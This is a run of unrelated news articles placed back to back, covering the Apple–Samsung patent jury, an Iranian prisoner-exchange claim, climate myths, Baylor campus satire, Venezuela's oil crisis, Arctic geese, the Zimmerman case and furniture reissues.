Some of the most influential evidence in the jury 's eyes included internal Samsung e-mails like the one from a designer describing the difference between the iPhone 's user interface and a Samsung phone as the `` difference between Heaven and Earth , '' as well as competitive intelligence documents where Samsung analyzed differences between its own phones and the iPhone . Also swinging the vote Apple 's way was the fact that Google warned Samsung that some of its products looked too similar to Apple products .
Despite the fact that the verdict came just two and a half days after closing arguments , Hogan insisted the jurors were thorough and methodical in their deliberations . `` We did n't whiz through this , '' he said . `` We took it very seriously . ''
Hogan , a 67-year-old electrical engineer who lives in San Jose , said he was influenced in part by his own experience acquiring a patent . By the end of the first day of deliberations , he said he decided that Samsung 's prior art arguments did n't hold up .
`` I was thinking about the patents , and thought , 'If this were my patent , could I defend it ? ' '' Hogan recalled . `` Once I answered that question as yes , it changed how I looked at things . ''
The jury `` wanted to send a message to the industry at large that patent infringing is not the right thing to do , not just Samsung , '' Hogan told the newspaper . `` We felt like we were 100 percent fair , but we wanted something more than a slap on the wrist . ''
Another juror , Manuel Ilagan , confirmed to CNET that Hogan 's influence on the jury was significant . `` He had experience , '' said Ilagan . `` He owned patents himself ... so he took us through his experience . After that it was easier . ''
We can by no means take this as a disinterested claim . And no specific names are mentioned . But a high-ranking Iranian government official , who is an appointee of reformist President Hassan Rouhani , says that Republicans asked the Iranians to delay last months prisoner exchange deal until after the Presidential election .
The original report comes from an openly pro-regime , quasi government news agency , Tasnim News Agency . And the official is Ali Shamkani , the head of Iran 's Supreme National Security Council . ( Here 's a backgrounder on Shamkani from al-Monitor . ) But there seems little reason to doubt that the Shamkani quote itself is genuine .
Here is the actual quote ( translation from Farsi , of course , from Tasnim ) …
“ In the course of the talks for exchanging prisoners , the Republican rivals of the current US administration who claim to be humanitarians and advocates of human rights sent a message telling us not to release these people ( American prisoners ) and continue this process ( of talks ) until the eve of US presidential elections , ” Shamkhani said Thursday in an address to a rally held in the central city of Yazd to mark the 37th anniversary of the 1979 Islamic Revolution 's victory . “ However ” he said “ we acted upon our independent resolve and moved the process forward . ”
Now , remember , Sen. Tom Cotton ( R-AR ) did pen an open letter ( signed by all his Senate colleagues ) cautioning the Iranian leadership not to conclude a nuclear deal with President Obama . But that was really more a PR stunt in the context of DC politics than any sort of effort to open a backchannel communication . Still , the backstory makes it hard to dismiss this allegation out of hand .
Shamkani was appointed to his role by a reformist . But his elevation and his appointment to earlier roles was more seen as carrying symbolic significance vis a vis Iran 's Arab neighbors . Shamkani is an ethnic Arab . And the only ethnic Arab to have risen so high in the government hierarchy .
The claim – true or not – is also reminiscent of long-standing claims – never definitively proven – that emissaries from the Reagan campaign asked the Iranians to delay the release of the Embassy hostages until after the 1980 election .
Looking for news you can trust ?
Subscribe to our free newsletters .
Leading into Friday 's upcoming release of the UN Intergovernmental Panel on Climate Change 's Fifth Assessment Report , climate skeptics have gone into overdrive . They 're doing anything they can to undermine public acceptance of the dangers posed by global warming , which , at least according to a leaked draft of the report , is “ extremely likely ” ( or , 95 percent certain ) to be caused by human activities .
Unfortunately , much of this glut of misinformation is likely to make its way to people in your life—whether it 's your congressman , your favorite talk radio host , or even your family . Heck , this stuff might even pop up in a heated conversation over your dinner table with your Uncle Larry ( who always seems to be dying to argue about climate change ) .
To prepare you , here 's the truth about four myths you 're likely to hear about climate science and the IPCC report :
Myth 1 : Global warming has stopped . Perhaps the most prominent attack on climate science right now centers on the claim that global warming is “ slowing down , ” sometimes followed by insinuations that scientists do n't understand why this is happening , or even that they have tried to cover it up . On occasion , this attack gets stretched into the assertion that global warming has stopped entirely over the past decade and a half , or even is just plain “ over. ” Possibly the strongest articulation yet of the meme came from Republican Rep. David McKinley of West Virginia , who said last week that there has been “ almost no increase in temperature ” in the last 40 years .
But that 's just incorrect , as the figure above from the World Meteorological Organization , marking global average temperatures by decade , clearly shows . Global warming has n't stopped at all . What 's actually happening is that the rate of surface warming has slowed somewhat over the past decade or more , probably because more heat has gone into the planet 's oceans . In other words , the excess heat is still here in the Earth system ; it 's just not where we typically measure it . “ Global warming is alive and well , ” climate scientist Kevin Trenberth of the National Center for Atmospheric Research explained to me last month , “ but about 30 percent of the heat is going deeper into the ocean . ”
At the same time , an increase in volcanic eruptions also seems to have generated a slight and temporary cooling influence that 's offsetting some of the warming effect of carbon dioxide , by reflecting some sunlight away from the planet . But none of this is a reason not to worry about climate change . Climate researchers say it 's likely that this temporary global warming slowdown will soon subside and warming will snap back , perhaps stronger than before .
Myth 2 : Arctic sea ice is recovering . One of the most dramatic indicators of global warming was last summer 's record low in the extent of Arctic sea ice—a drop that was 18 percent below the previous low in 2007 . Since nothing about global warming suggests that you break a new record every successive year , it 's not surprising that the Arctic sea ice melt was less dramatic this year . This year 's seasonal low in ice extent was merely the sixth-lowest level on record .
Somehow , global warming skeptics found a way to call this good news . In particular , the Mail on Sunday in the United Kingdom ran an article hailing a “ rebound ” in sea ice and pronouncing that “ And now it 's global cooling ! ” Because 2013 did not beat 2012 's record , and was only the sixth-lowest sea ice extent on record , skeptics celebrated an “ increase of 60 percent. ” Actually , here 's what 's happening to Arctic sea ice when you include , er , context :
No wonder political psychologists have recently found that ideology can wreck your ability to do math . For a thorough debunking of sea ice misinformation , see this video with astronomer and reality-based blogger extraordinaire , Phil Plait .
Myth 3 : Growing Antarctic ice undermines global-warming concerns . Lately skeptics have also been drawing attention Antarctic sea ice , which just hit a 35-year record high . Rush Limbaugh actually appears to have gotten confused over this , claiming recently on his show that Arctic ice was at a record extent , before correcting himself and realizing that he meant Antarctica—the place with , you know , the penguins rather the polar bears .
That Antarctic sea ice has been growing of late is not in dispute , but again , this is no refutation of global warming . Scientists are currently trying to figure out why Antarctic sea ice is increasing , and one theory points to stronger winds due to a stronger polar vortex—a phenomenon apparently capable of overcoming a general warming of the Southern Ocean .
Overall , it is important to understand that the Antarctic is very different from the Arctic . As Michael Lemonick of Climate Central puts it :
The Arctic is an ocean surrounded by land , while the Antarctic is land surrounded by ocean . In the Arctic , moreover , you 've got sea ice decreasing in the summer ; at the opposite pole , you 've got sea ice increasing in the winter . It 's not just an apples-and-oranges comparison : it 's more like comparing apple pie with orange juice .
The IPCC 's leaked draft report says scientists have “ low confidence ” in their understanding of what 's going on with Antarctic sea ice . It also predicts , with “ low confidence , ” that this ice too will decline by the end of the century . In other words : Antarctica is complicated , remote , and little understood .
All of which , incidentally , highlights why you should trust scientists on climate change : They know what they do n't know and are honest about it , as the Antarctica case shows . That 's why , when they express 95 percent confidence that humans are driving global warming ( in the same report that confesses a relative lack of understanding of what 's happening with Antarctic sea ice ) , it is worth paying attention .
Myth 4 : Global warming wo n't be a big deal ; it might even be good for you . As usual , there are more- and less-nuanced climate skeptics . Among the former , one of the most popular arguments is that global warming wo n't be as bad as previously thought .
One recent version of this argument was articulated by British science writer Matt Ridley , who argued in the Wall Street Journal that the leaked IPCC report “ dials back the alarm ” on global warming . Similarly , climate change contrarian Bjorn Lomborg is now arguing that the new report will support a “ moderate climate change message , ” rendering “ alarmist scenarios ever more implausible . ”
All of this is pretty hard to believe , given that IPCC chairman Rajendra Pachauri has recently stated that when it comes to the climate issue , it 's “ five minutes before midnight. ” But let 's consider the arguments for a more modest global warming , starting with Ridley 's .
Ridley draws our attention to a small change to the high-end scientific estimate of how sensitive the climate is likely to be to a doubling of carbon dioxide emissions . In 2007 , the IPCC put the low end of this range at 2 degrees Celsius ; now—at least according to the leaked draft report—it is 1.5 degrees . The upper end of the range has not changed : It is 4.5 degrees Celsius .
Does this 0.5-degree shift matter ? Although the rosiest scenario may have gotten slightly rosier , there 's no reason to assume we 'll be so lucky , or that global warming will be mild . Rebutting Ridley in the Wall Street Journal letters section , climate scientist John Abraham of the University of St. Thomas put it like this :
Basically , he is arguing that the Earth may undergo a slow simmer , whereas most scientists think it will be a faster boil . Either way , the consequences are enormous .
And there 's another problem with Ridley 's outlook . Much of his op-ed focused on how much warming we 'll see in the next 70 years or so—in fact , he argues that by 2083 , the “ benefits of climate change ” may “ still outweigh the harm. ” Abraham counters that “ we are already seeing economic and ecological damage , including increased precipitation in some regions , with consequent flooding , more severe drought in other regions , increased storms , heat waves and rising sea levels . ”
In any case , the IPCC draft report plainly says that global warming will continue well past the year 2100 . That 's only the beginning . The draft report explains that we can expect some of the carbon that we 've emitted to stay in the atmosphere for over 1,000 years and for warming to continue for “ several centuries. ” The report implies that over the long term , sea levels could eventually rise on the order 5 to 10 meters ( other scientists have placed it higher still ) .
Lomborg , for his part , acknowledges that global warming is a “ problem , ” just a modest one . “ The IPCC 's predictions do not support alarmist predictions of global temperature rise that are often in the order of 5ºC ( 9ºF ) and 1-2 meters ( 3-6 ) feet of sea level rise—not to mention Al Gore 's 6 meters ( 20 feet ) , ” he claims . Yet much of this may depend on your time frame , as we 've seen .
The upshot is that nobody can be absolutely certain which scenario for global warming in the 21st century will actually be realized . The question is , and has always been , about managing risks—risks not just for us , but risks to our children , grandchildren , and untold future generations if we leave them a badly damaged planet . Ridley and Lomborg could be right that global warming will still be relatively mild after 70 years , and will stay on the low end . But can we really take that chance ?
Past members include a NFL star , a Tony winner , and Politician Rand Paul , but it 's the current members of a secret society at Baylor who have taken a `` NoZe '' dive into the spotlight by making big waves at the Waco university .
During Saturday 's 2016 Homecoming Parade , members of `` The Noble NoZe Brotherhood , '' the group famous for pranks and publishing the satirical newspaper The Rope , mocked the Baylor administration , namely the Board of Regents , over the school 's on-going sexual assault scandal .
`` The world 's largest Baptist University ... not that much a fan of free speech 100 % of the time , '' said the group 's President , Brother `` CocoNoZe Shrimp II , '' also referred to as the `` Lorde Mayor . ''
By wearing wild outfits with a signature nose-and-glasses garnish , the `` brothers '' can be more expressive , and less conspicuous .
`` There 's a reason we wear disguises , '' said Brother `` CocoNoZe Shrimp II . ''
Established in 1918 , the self-proclaimed eldest group at Baylor has a long history of poking fun at the conservative college , and Homecoming 2016 was no exception .
`` It 's our job to keep everyone at Baylor from taking themselves too seriously , '' said Brother `` CocoNoZe Shrimp II . ''
In full `` NoZe '' garb Saturday , plastic noses and all , members publicly shamed the university for how it has currently , and historically handled sexual assaults .
`` We were 'The Baylor Board of Regents Cleaning Service ' ... 'we wo n't clean your carpet , but we 'll sweep things under the rug for you , '' said Brother `` CocoNoZe Shrimp II '' of their bold display . `` We did a shout-out to the Chipotle because , much like the Board of Regents , 'we keep things under wraps . ' ''
While they 're famous for wearing those large `` NoZes , '' the Brotherhood believes , when it comes to sexual assaults on-campus , Baylor 's Board of Regents are the real `` Pinocchios . ''
`` We figured , well , who was the liar 100 % of the time ? And that 's when we went 'oh , the Board of Regents , that 's easy , ' '' said Brother `` CocoNoZe Shrimp II . ''
But HOW to express such a serious message with humor was tricky .
`` We had to really think about 'how do you talk about what 's going on at Baylor and not make rape jokes ? ' '' said Brother `` CocoNoZe Shrimp II . '' `` We never want to hurt the victims , but it seemed irresponsible not to talk about it . ''
So according to the Lorde Mayor , five minutes before the parade , they decided to show their support for victims of sexual assault by holding brooms beside their float , a red pickup truck dragging a carpet , to symbolize Baylor administrators were `` sweeping the issue under the rug . ''
`` Sometimes we say stupid stuff and it 's funny and everyone likes it , sometimes we say real stuff and everyone does n't like it , '' said Brother `` CocoNoZe Shrimp II . ''
However , many did like it . The group received a lot of support on social media , and some even at the parade .
`` One person came up to me , I gave them The Rope , and he said 'thank you for saying what everyone in Waco thinks , ' '' said Brother `` Orange Mocha FrappucciNoZe . '' `` And that just made my heart bleed . ''
However , it 's not their hearts , it 's not their noses , it 's their voices they hope will change their university .
`` We 'll still be not taking ourselves seriously , we 'll still be making dumb jokes , but we 're gon na talk about whatever needs to be talked about , and we 're not gon na ignore it , and I think it 's important that we just keep talking , '' said Brother `` CocoNoZe Shrimp II . ''
The Brotherhood has had an `` iffy '' relationship with the university over it 's 90-year history . In KCEN 's exclusive interview Monday , members said while the university allowed them to be part of this year 's parade , the university 's religious department had denounced the group in recent years , liking it to an `` excommunication . '' Brothers also claimed the university purposefully kept them out of photos of this year 's Homecoming floats .
A Baylor official responded to the group 's parade display Monday , saying the students were 'well within their rights to express themselves , ' and they did not violate any university policy .
Besides publishing The Rope and performing pranks , although independent from the university , the Brotherhood asserts it does beautification on-campus , and has an endowment fund . To learn more about `` The Nobel NoZe Brotherhood '' and it 's approximately 20 members , visit www.thenoze.org .
An economic system aimed at freeing Venezuelans from poverty and a corrupt government is now starving them .
Food subsidies , higher education enrolment and access to healthcare were touted by long-time leader Hugo Chavez as evidence that his socialist revolution was a success . However , Chavez ' time in office from 1998 to 2013 also launched two developments that lie at the root of Venezuela 's current economic crisis : the expropriation of the oil industry in the name of nationalization and the expansion of import-based goods .
Nicolas Maduro , his handpicked successor , continued this trend when he took office in 2013 .
- How will the military react ?
- Opposition leader Capriles : The government is promoting the violence
- Venezuela 'coup ' slammed across the world
Venezuela is facing the worst economic crisis in its history and the lowest oil production - only 2.5 million barrels a day - in 23 years . Here 's a look at five key points to understanding what went wrong .
Deadly protests have erupted in recent weeks over fears that the president will eliminate congressional powers
1 . How Venezuela can be oil rich , but cash poor
A lack of economic diversification lies behind Venezuela 's economic woes .
According to OPEC 's 2015 figures , Venezuela has the most proven crude oil reserves in the world , with over 300 billion barrels . That puts it ahead of Saudi Arabia ( 266 billion barrels ) , Iran ( 158 billion barrels ) and Iraq ( 142 billion barrels ) .
Even though oil does not automatically equal cold , hard cash , the Venezuelan government has spent its money as if it did . A lack of transparency complicates determining exact figures on spending . What is clear , however , is that Chavez put black gold at the center of his economy : over 90 percent of Venezuela 's exports and roughly half of the government 's revenue come from oil .
When oil plummeted from $ 115 ( 107 euros ) a barrel in 2014 to nearly half that , Venezuela 's GDP shrank by 10 percent . The cost of a barrel of oil has been hovering around $ 50 since last year .
The legacy of Hugo Chavez is controversial . Supporters revere the political revolutionary . But critics attribute him with disasterous economic policies at the root of today 's multiple crises
2 . Oil without expertise is worthless
Oil prices do n't tell the whole story . Chavez 's approach to profiting from oil - which has been worsened by his successor - can be summed up by one word : mismanagement .
Petróleos de Venezuela ( PDVSA ) , Venezuela 's state-run oil company , staged a strike in 2002 after a coup failed to remove Chavez from power . In return , he fired roughly 18,000 of its personnel . The move marked the beginning of an intrusive approach to running state oil .
Opinion : A coup in Venezuela
In 2006 , Chavez began another dangerous trend : minimizing investments in infrastructure and maximizing control of oil fields . Production declined without cutting-edge technology from foreign companies , not to mention supplies , like natural gas injections to extract oil .
Last year , Caracas imported 50,000 barrels of light crude oil just to prepare heavy crude oil for export . Without it , Venezuelan oil is useless .
President Maduro took office after Chavez 's death in 2013 . His government has circumvented an opposition-controlled legislative branch by issuing decrees
3 . Tankers ca n't deliver
Maritime law only allows vessels to sail the high seas if they meet environmental standards . Venezuela 's crude-stained , aging tankers do n't .
The PDVSA has a backlog of cleaning bills it ca n't pay . According to a recent Reuters report , the wait for some tankers lasts up to two months .
Scrub-downs aside , the ever-increasing likelihood of a Russian shake-down has given PDVSA even more cause for concern . In October , Russian state-owned shipping conglomerate Sovcomflot , which provides 15 percent of Venezuela 's tankers , refused to release a vessel with Venezuelan oil over outstanding shipping fees . The bill : $ 30 million .
Venezuela owes money across the world as it defaults on payments for new tankers in Iran and shipyards in Portugal . Reports that PDVSA missed a $ 404-million payment in November - on bonds maturing in 2021 , 2024 and 2035 - have further worried investors . The company denied the reports , attributing the delay to a technical issue .
This archive picture from 2002 shows an oil tanker in Maracaibo , Venezuela during the strike against Chavez . In the years since , Venezuela has failed to modernize its oil delivery system
4 . Russia and China bankrolling Venezuela
The biggest concern right now is that Venezuela will default on sovereign debt .
Moody 's changed the outlook for Venezuela in 2016 from stable to negative in light of the `` high probability '' of a default .
International banks have long kept their distance from Caracas , which has imposed currency controls that require businesses to buy their money not through private banks , but through the government .
Read : Regional countries urge Venezuela to hold elections
In 2014 , Venezuela borrowed nearly $ 50 billion from China and an estimated $ 5 billion from Russia when oil prices were more favorable . The deal was to pay back creditors in oil and fuel . A Reuters report in January , citing internal documents , said that shipments were delayed by up to 10 months .
Unable to extract more oil , much less ship it quickly , PDVSA has few options to increase its cash flow - making a sovereign debt crisis for the oil-dependent country more likely .
Multiple crises and an undiversified economy have pushed Venezuelans to their limit . Tear gas or water cannon awaiting them , they refuse to back down
5 . How this crisis could spill into the US
A name heard often in connection with Venezuela 's crisis is Citgo . PDVSA bought the Houston-based refiner in the 1980s .
In late 2016 , Venezuela 's state-oil company used nearly half of its shares in Citgo as collateral for loans it received from Russian-company Rosneft .
Although financial experts have questioned the likelihood of Russia taking over Citgo if PDVSA defaulted on the loan , US lawmakers are n't so sure . In April , Republican and Democratic lawmakers in Washington warned President Donald Trump of the unusual business dealings . According to their letter , Russian involvement in the Houston-based company could pose a problem to US national security .
Read : Venezuela 's appeal to UN an 'admission of inability '
The only silver-lining of Venezuela 's political crisis is the prospect of snap elections . Opposition-led demonstrations might strain Maduro enough to leave office before 2019 . Signs of a political shift toward economic diversification and a willingness to open its markets to foreign companies could bolster market confidence - and save Venezuela from drowning in its own oil .
WINNIPEG , MB. , May 6 , 2017 – The Winnipeg Football Club can confirm they are working alongside the group that is committed to bringing a Tier 1 FIFA sanctioned soccer league to Canada .
The proposed league , the Canadian Premier League ( CPL ) – will place teams in many markets and will assemble an ownership group of owner/operators with world-class experience . A Hamilton ownership group has already confirmed they are on board and will support a team . Currently , Canada does not have its own professional league .
Earlier this year , the WFC expressed an interest in establishing a team here in Winnipeg . As part of this ongoing process , the WFC has applied and been accepted as a member of the Canadian Soccer Association . The team would play out of Investors Group Field , currently home to the CFL 's Winnipeg Blue Bombers .
“ For the past 18 months , we have been working with the group that is spearheading this venture and have indicated our interest in founding a club here in Manitoba , ” said WFC President & CEO Wade Miller .
Details on the CPL are still forthcoming , but the league is hoping to commence play in the fall of 2018 .
“ We know from hosting the 2015 FIFA Women 's World Cup that this community has a passion for the sport , ” added Miller . “ There has been a lot of work done behind the scenes to move this endeavor forward . ”
The WFC looks forward to updating the community over the next several months on the progress of the Canadian Premier League and the status of a potential team in Winnipeg .
For updates and more information , and to show your support for a premier soccer team in Manitoba , please go to bluebombers.com/soccer .
First Female Members Sworn In to Shura Council The first female members of Saudi Arabia 's Shura Council were sworn in by King Abdullah on Tuesday .
The Shura Council , composed of 150 members , councils the government in decisions regarding legislation . However , the Council does not have legislative powers itself and all members are appointed by the king . 30 women now hold seats on the Council , which is the first time women have held public office in the country .
Thuraya al-Arrayed , one of the 30 new female Council members told the BBC `` I must say it 's an historic occasion . I 'm honoured to be part of it . If it works , if it is positive then it will change the attitudes that are still worrying about the participation of women . I 'm not just talking about the Shura Council , I 'm talking about the empowerment of women and their participation in the general affairs of the country . ''
Despite this advancement , women in Saudi Arabia face limited public involvement . In 2011 , the King granted women the right to vote and run for public office as early as 2015 . Despite gaining the right to vote , Saudi women still have to rely on male relatives or paid drivers to get around by car due to a religious edict issued by Muslim clerics . Women are also being tracked by text message . Media Resources : BBC 2/20/2013 ; Al Arabiya 2/19/2013 ; Feminist Newswire 11/27/2012 , 9/26/2012 , 6/17/2011
© Feminist Majority Foundation , publisher of Ms. magazine If you liked this story , consider making a tax-deductible donation to support Ms. magazine .
Bob Weber , The Canadian Press
Wildlife scientists want Inuit hunters to kill more Arctic-nesting geese in an effort to manage populations so out of control the birds are destroying their own habitat .
Experts acknowledge the plan is n't likely to work and admit they do n't know what to do about ballooning numbers of Ross 's geese that are denuding large areas of the North .
`` It 's really unprecedented in waterfowl management history to have a population that 's out of control and ca n't be controlled through hunting , '' said Jim Leafloor of the Canadian Wildlife Service . `` We 're not really sure at this point where it 's all going to lead . ''
Ross 's geese -- which migrate between Canada 's northern coastline and as far south as California -- were once hunted so extensively that their numbers were down to a few thousand in the 1930s . Environmental protections and the spread of agricultural practices that favour bird foraging have changed all that .
Kiel Drake of Bird Studies Canada estimates there are now about two million of the small , white geese . Together with about five million lesser snow geese -- which have tripled their numbers since the 1970s and have similar habits -- that spells big , honking trouble .
`` It 's the way they feed , '' said Leafloor . `` They strip vegetation from fairly large areas . ''
Sky-filling flocks are hammering their tundra nesting grounds in the Queen Maud Bird Sanctuary along the Northwest Passage . The destruction follows their migration path south , through the coastal marshes of Hudson Bay and James Bay .
`` A lot of that habitat is already destroyed , '' said Leafloor . `` The losses there just continue to mount and expand into other areas . ''
Grazing geese strip the land bare , exposing soil and peat . Recovery is slow in the Arctic 's cold climate and poor soil .
Ripping out vegetation also changes the flow of soil moisture . It draws salts to the surface and prevents normal plants from growing back . That , in turn , affects other birds and animals .
Last week , wildlife service officials asked the Nunavut Wildlife Management Board to agree to have Ross 's geese declared overabundant , which would allow managers to expand the hunting season . The board has made a recommendation to federal Environment Minister Peter Kent , who is to make the final decision .
`` We think the population of ( Ross 's geese ) might be small enough that it could be controlled through hunting , '' Leafloor said . `` That remains to be seen . ''
Snow geese were declared overabundant in 1999 . Hunters are allowed to shoot them spring through fall , but it has n't made much difference .
`` We think that 's an example of a population that 's beyond the ability of hunters to control . ''
Nor is Mother Nature likely to take a hand by reducing numbers through overcrowding and disease . If their regular habitat becomes too degraded or crowded , the birds just find another area and strip it .
Others stay behind and eke out a living on their original feeding grounds , preventing recovery .
`` The problem expands as the population expands , '' Leafloor said .
No one really knows how much of the Arctic is already affected . And no one really knows where the problem is headed .
`` Nobody knows what the limits are , '' said Leafloor .
`` We do n't know what the carrying capacity of the Arctic is . We do n't know how much food is there and how much natural habitat is available to support these geese .
`` What we 're doing right now is monitoring them and watching the changes in population size and documenting changes in their range .
`` But beyond that , what do you do with multimillions of geese ? ''
Summer music festivals are a lot of fun , but they 're also notorious for their humidity and sweltering temperatures . Direct sunlight and high density seating can make the hot weather teeter on unbearable — but this summer , some of the biggest music festivals on the planet are taking steps to cool off music lovers . Here 's how .
Coachella : Cool tents from sponsors and VIP perks
Located near the desert town of Indio , California , Coachella is notorious for exceedingly high temperatures . The festival 's promoters and sponsors have taken steps to ensure that people have access to air conditioning during the often triple-digit temperatures .
During the April 2014 event , there was an air conditioned oasis tent strategically sponsored by Spotify . While this particular tent only held 150 people , the music festival featured other ways to enjoy air conditioning .
Samsung sponsored a similar tent with free air conditioning and Wi-Fi . But the best A/C was enjoyed by attendees who bought the VIP packages offered at Coachella . Festival-goers were able to reserve a fully air conditioned tent to have all to themselves . While reserving these special climate-controlled tents was considerably more expensive than the regular price of admission , they came fully furnished and sealable so as not to let any cool air escape . Sometimes , comfort is worth a little bit extra .
As for the food and concert facilities , Coachella promoters also had to supply cooling and air conditioning for vendors serving ice cream , cocktails , and other cold food items . The festival also had to keep performers and festival employees protected from the hot weather as much as possible .
Bonnaroo : Mist tents and air conditioned movies
Nestled deep in rural Tennessee , Bonnaroo pays homage to the traditional camping music festival , allowing people to sleep in tents on the festival grounds . Naturally , these tents do not come with air conditioning — so the event promoters are implementing air conditioning in various areas throughout the festival . Because the festival lands in June , one of the summer 's hottest months , there are tents with air conditioning , as well as showers , mist stations , and drinking foundations . And this year , the festival will feature Bonnaroo Cinema 2014 , which is an air conditioned venue with seats to watch films and television like the NBA Finals .
As at Coachella , Bonnaroo 's best air conditioned venues are accessible with a VIP pass . Unless you are a vendor serving iced drinks or frozen treats , it is unlikely that you will get your own air cooling system . But knowing the layout of the festival is the best way to enjoy a tent with A/C . Many of these tents are cooled through on-site air conditioners and air cooling systems .
Lollapalooza : Different passes for different temps
Chicago 's Lollapalooza is another summer music festival synonymous with hot weather . Located in the heart of the city 's Grant Park , the Lollapalooza Music Festival happens in August , a supremely hot and muggy month . The way that this festival offers air conditioning is based on the level of pass you buy . While there are air conditioned areas for everyone , they are often overly crowded ( which sort of defeats the purpose of getting cool at a certain point ) . Lollapalooza 's Platinum pass gives guests access to a special air conditioned VIP-only area on the north and south sides of the venue .
While all of these festivals require a bit of a “ grin and bear it ” ( or “ have a beer and forget it ” ) attitude toward heat and crowds , the AC systems they 're using are pretty innovative . The vast majority of the on-site air conditioned facilities are portable or collapsible — in other words , when the festival is over , these systems are taken down . This is a prime example of how far heating , ventilating , and air conditioning capabilities have come over the years .
Two of the most important people in Dean Winchester 's life are about to meet , and we 've got a sneak peek at Sam coming face-to-face with his brother 's new friend , Benny , in the Oct. 31 episode of Supernatural ( The CW , 9/8c ) .
PHOTOS | Supernatural : Sam Goes on a Date , Dean 's ‘ Dad ' Plays Detective and More !
After Dean comes to Benny 's rescue following a vampire attack , the two go after the latter 's maker ( guest star Patrick Stafford ) . But things get ugly , and the elder Winchester is forced to call on his bro — who 's reflecting on his old life with ex-girlfriend Amelia — for help . Will he tell Sam the whole truth about his bloodsucking pal ?
Check out a preview of the episode ( penned by fan favorite Ben Edlund ! ) below , and then hit the comments with your thoughts .
Story highlights The medical exam took place a day after Trayvon Martin was killed
The report also says Zimmerman had two black eyes
Martin 's family has questions about the report
George Zimmerman is charged with second-degree murder
A medical report by George Zimmerman 's family doctor shows the neighborhood watch volunteer was diagnosed with a fractured nose , two black eyes and two lacerations on the back of the head after his fatal confrontation with Trayvon Martin .
The medical exam , which was taken a day after Zimmerman 's February 26 altercation with the unarmed 17-year-old , says Zimmerman suffered a `` closed fracture '' of his nose , according to two sources who have detailed knowledge of the investigation .
Zimmerman , 28 , is accused of killing Martin on February 26 as the African-American teenager walked back to the Sanford , Florida , house where he was staying , after visiting a convenience store . Prosecutors have said Zimmerman , who is a white Hispanic , killed Martin unjustly after profiling him .
Zimmerman , who acknowledges shooting Martin but claims self-defense , has entered a not guilty plea in the case , which has not yet been scheduled for trial .
Zimmerman faces a second-degree murder charge in the case , which has gripped the country , caused nationwide protests and has shined a light on race relations and gun laws in Florida .
JUST WATCHED New evidence in Trayvon Martin killing Replay More Videos ... MUST WATCH New evidence in Trayvon Martin killing 04:41
JUST WATCHED New medical report may help Zimmerman Replay More Videos ... MUST WATCH New medical report may help Zimmerman 01:17
JUST WATCHED Why Zimmerman apologized in court Replay More Videos ... MUST WATCH Why Zimmerman apologized in court 01:13
JUST WATCHED George Zimmerman leaves jail Replay More Videos ... MUST WATCH George Zimmerman leaves jail 00:48
After the shooting , Zimmerman told police that Martin rushed him after they exchanged words , knocked him to the ground and repeatedly hit his head against a concrete sidewalk .
The medical report appears to lend support to Zimmerman 's claims . It also mirrors earlier statements made by Zimmerman 's father , brother and lawyer .
Zimmerman 's brother spoke of the medical reports in a March interview with CNN 's Piers Morgan .
`` We 're confident the medical records are going to explain all of George 's medical history , '' Robert Zimmerman Jr. said at the time . `` You return force with force when somebody assaults you . George was out of breath , he was barely conscious . George ( would have been ) dead if he had not acted decisively and instantaneously in that moment . ''
The Martin family has questions about the medical report , said Benjamin Crump , the family attorney .
`` The family has very strong positions about this family physician 's report that was done the next day , '' Crump said . `` What we do know is on February 26 , the ER personnel did not believe his injuries were significant enough for him to go to the hospital . They did n't even put a Band-Aid on his head . That 's important . ''
Also Tuesday , CNN affiliate WFTV reported that Martin 's autopsy showed the teen had injuries to his knuckles when he died .
That evidence could also support the theory that Martin and Zimmerman fought .
Crump also responded to that report Tuesday night .
`` He was fighting for his life , '' he told Anderson Cooper . `` Let 's not forget that Trayvon Martin was fighting a man with a 9-millimeter gun . We also have to remember that he did n't start this fight . George Zimmerman got out his car and pursued Trayvon Martin . ''
On the night of the shooting , Zimmerman had called 911 to complain about a suspicious person in the neighborhood , according to authorities .
In the call , Zimmerman said he was following Martin after the teen started to run , prompting the dispatcher to tell him , `` We do n't need you to do that . ''
Zimmerman apparently disregarded that advice .
Sanford police initially declined to arrest Zimmerman , saying there was no evidence to contradict his claim of self-defense under Florida 's `` stand your ground '' law , which allows people to use deadly force anywhere they feel a reasonable threat of serious injury or death .
After weeks of protests demanding his arrest , a special prosecutor appointed by Florida Gov . Rick Scott filed the second-degree murder charge against Zimmerman .
He was arrested on April 11 and briefly jailed . He has returned to hiding after his release on $ 150,000 bond .
IN 1970 , I worked as a stationery buyer at Georg Jensen , then a multilevel store on Fifth Avenue filled with china from Royal Copenhagen and other precious things . The company 's large wholesale business in Scandinavian furniture—hugely popular at one time—had become a major money loser and was on its last legs : The world was captivated instead with everything Italian .
Today , thanks to demand for furniture that has that classic , 20th-century feel but is n't overexposed , the fortunes of those Northern European designs have turned around dramatically . So much so that companies such as Fritz Hansen , Carl Hansen & Son and Artek are reseizing the spotlight by combing through dusty archives , cellars and attics to reissue any potential lost treasure .
Reissues are not a new phenomenon—the Italian company Cassina began reviving Le Corbusier pieces in 1964 . But the market for them has exploded in the last few years . It 's good news for people who want a classic piece but have neither the time nor desire to scour antiques sales or stalk 1stdibs for a rare example of Hans Wegner 's Papa Bear chair . Even better , these new-old pieces give you a wider range of options than the list of acceptably iconic pieces that , while great , are verging on being overused .
“ Things like the Barcelona chair are victims of their own success because they 're knocked off , sometimes very poorly , ” said New York designer Steven Sclaroff ( whose clients include Kate and Andy Spade ) of the classic seat originally designed by Ludwig Mies van der Rohe in 1929 . Over time , the chair has become a modernist cliché , littering office foyers and décor-by-the-numbers homes . Other star pieces , such as the lounge chair and ottoman by Charles and Ray Eames , have become equally ubiquitous as shorthand for good taste in everything from luxury condo brochures to shelter magazines .
PERIOD PIECE | The Landmark Chair ( foreground ) in the East Hampton , N.Y. , home of its creator , Ward Bennett , photographed in 1978 . The 1964 design was recently reissued by Herman Miller . Photo : Peter Aaron/Otto Archive
An antidote to been-there-done-that predictability , the new wave of reissues is not limited to Scandinavian design . This year , American furniture giant Herman Miller is aiming to re-establish the work of Ward Bennett , a mostly forgotten American designer whose mix of high-tech materials and sensuous forms epitomized later 20th-century style . Similarly , this fall , Herman Miller 's closest competitor , Knoll , is reissuing a lesser-known settee version of its best-selling but rather commonplace Womb Chair , designed by Eero Saarinen .
“ There 's nothing better than an authentic reissue . You see the piece and you think of the person and what went behind it , ” said Lee Mindel , a principal at New York architecture studio Shelton , Mindel & Associates , whose client list includes Ralph Lauren and Sting and Trudie Styler .
